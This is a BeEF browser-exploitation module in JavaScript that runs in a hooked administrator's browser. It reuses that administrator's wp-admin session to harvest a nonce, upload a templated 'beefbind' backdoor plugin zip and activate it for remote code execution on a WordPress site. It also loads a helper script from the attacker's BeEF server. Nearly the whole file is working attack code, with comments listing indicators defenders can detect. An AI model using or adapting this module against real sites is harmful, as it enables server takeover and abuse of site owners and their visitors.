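/*
Copyright (c) Browser Exploitation Framework (BeEF) - https://beefproject.com
See the file 'doc/COPYING' for copying permission

This is a rewrite of the original module misc/wordpress_post_auth_rce.

Original Author: Bart Leppens
Rewritten by Erwan LR (@erwan_lr | WPScanTeam)
*/

// Post-auth WordPress RCE: from the hooked browser, upload a "beefbind" plugin
// zip through wp-admin's plugin uploader and then follow the "Activate Plugin"
// link WordPress renders. Every request rides the victim's own authenticated,
// same-origin wp-admin session, so it requires a hooked user who is allowed
// to install plugins (typically an administrator).
//
// The helpers used below (get_nonce, post_as_binary, get, log) are NOT defined
// in this file: they are served as /wp.js by the BeEF server and injected into
// the hooked page on first use. They are presumed to report through the
// globals beef_command_url / beef_command_id set at the top — confirm in wp.js.
//
// Operator / defender notes (all visible in the requests this module emits):
//  - Success detection matches the English wp-admin strings ("Plugin installed
//    successfully", "Plugin activated"); on a localized WordPress the plugin
//    may well be installed/activated but reported here as an error.
//  - The multipart boundary "BEEFBEEF", the upload name "beefbind.zip" and the
//    resulting plugin path beefbind/beefbind.php are static indicators; a WAF,
//    IDS or plugin-directory audit can key on them.
//  - <%= @wp_path %> and <%= @auth_key %> are templated verbatim into JS
//    string literals; a value containing a quote, backslash or newline would
//    break this script, so keep operator input free of such characters.
beef.execute(function() {
  // Intentionally global (no var): the wp.js helpers use these to report back.
  beef_command_url = '<%= @command_url %>';
  beef_command_id = <%= @command_id %>;

  var wp_path = '<%= @wp_path %>';
  // Page that carries the upload form and its _wpnonce; it is also sent back
  // as _wp_http_referer so WordPress's referer check on the upload passes.
  var upload_nonce_path = wp_path + 'wp-admin/plugin-install.php?tab=upload';
  var upload_plugin_path = wp_path + 'wp-admin/update.php?action=upload-plugin';

  // Build the multipart/form-data body by hand. The zip bytes are embedded
  // server-side by generate_zip_payload (assumed to emit a JS-string-safe
  // encoding — confirm), so FormData/Blob is not used. The filename parameter
  // is kept on the Content-Disposition line itself: a bare continuation line
  // without leading whitespace is not valid header folding and may be dropped
  // by the server's multipart parser, leaving the upload without a name.
  function build_upload_body(nonce, boundary) {
    var parts = [
      '--' + boundary,
      'Content-Disposition: form-data; name="_wpnonce"',
      '',
      nonce,
      '--' + boundary,
      'Content-Disposition: form-data; name="_wp_http_referer"',
      '',
      upload_nonce_path,
      '--' + boundary,
      'Content-Disposition: form-data; name="pluginzip"; filename="beefbind.zip"',
      'Content-Type: application/octet-stream',
      '',
      '<%= Wordpress_upload_rce_plugin.generate_zip_payload(@auth_key) %>',
      '--' + boundary + '--',
      ''
    ];
    return parts.join('\r\n');
  }

  // Second hop: report the outcome of the activation request.
  // get() is expected to hand back an XHR whose responseXML is the parsed
  // wp-admin page; a null document or missing #message is reported instead of
  // throwing inside the callback (which would otherwise lose the error).
  function handle_activation_response(xhr) {
    var doc = xhr.responseXML;
    var message = doc ? doc.getElementById('message') : null;

    if (message == null) {
      log('Could not find activation result in response', 'error');
      return;
    }

    var result_text = message.innerText;

    if (/plugin activated/i.test(result_text)) {
      log('Plugin installed and activated! - Auth Key: <%= @auth_key %>', 'success');
    } else {
      log('Error while activating the plugin: ' + result_text, 'error');
    }
  }

  // First hop: parse the upload response and, on success, follow the
  // "Activate Plugin" button WordPress renders, which carries a fresh nonce:
  // <div class="wrap">...<a class="button button-primary"
  //   href="plugins.php?action=activate&plugin=beefbind%2Fbeefbind.php&_wpnonce=..."
  //   target="_parent">Activate Plugin</a>
  function handle_upload_response(xhr) {
    var doc = xhr.responseXML;
    var result = doc ? doc.getElementsByClassName('wrap')[0] : null;

    if (result == null) {
      log('Could not find result of plugin upload in response', 'error');
      return;
    }

    var result_text = result.innerText;

    if (!/Plugin installed successfully/i.test(result_text)) {
      log('Error while installing the plugin: ' + result_text, 'error');
      return;
    }

    var activation_tag = result.getElementsByClassName('button-primary')[0];

    if (activation_tag == null) {
      log('Plugin installed but unable to get activation URL from output', 'error');
      return;
    }

    // The href is relative to wp-admin/ (plugins.php?action=activate&...).
    var activation_path = wp_path + 'wp-admin/' + activation_tag.getAttribute('href');
    get(activation_path, handle_activation_response);
  }

  // Upload the templated plugin zip using the harvested nonce, then activate it.
  function upload_and_active_plugin(nonce) {
    // Static boundary: must never occur inside the zip bytes, and is an IOC.
    var boundary = 'BEEFBEEF';
    post_as_binary(upload_plugin_path, boundary, build_upload_body(nonce, boundary), handle_upload_response);
  }

  // Entry point once the wp.js helpers are available.
  function run() {
    get_nonce(upload_nonce_path, '_wpnonce', function(nonce) {
      upload_and_active_plugin(nonce);
    });
  }

  // Inject wp.js once per page and start only after it has executed (a
  // script element's onload fires after its body ran), instead of after a
  // fixed delay that races the download from the BeEF server.
  if (typeof get_nonce === 'function') {
    run();
  } else {
    var wp_script = document.createElement('script');
    wp_script.setAttribute('type', 'text/javascript');
    wp_script.setAttribute('src', beef.net.httpproto + '://' + beef.net.host + ':' + beef.net.port + '/wp.js');
    wp_script.onload = run;
    wp_script.onerror = function() {
      // log() itself lives in wp.js, so report through the core BeEF channel
      // (assumes the standard beef.net.send(url, id, data) API — confirm).
      beef.net.send(beef_command_url, beef_command_id, 'result=Could not load wp.js helper script');
    };
    var head = document.getElementsByTagName('head')[0];
    head.insertBefore(wp_script, head.firstChild);
  }
});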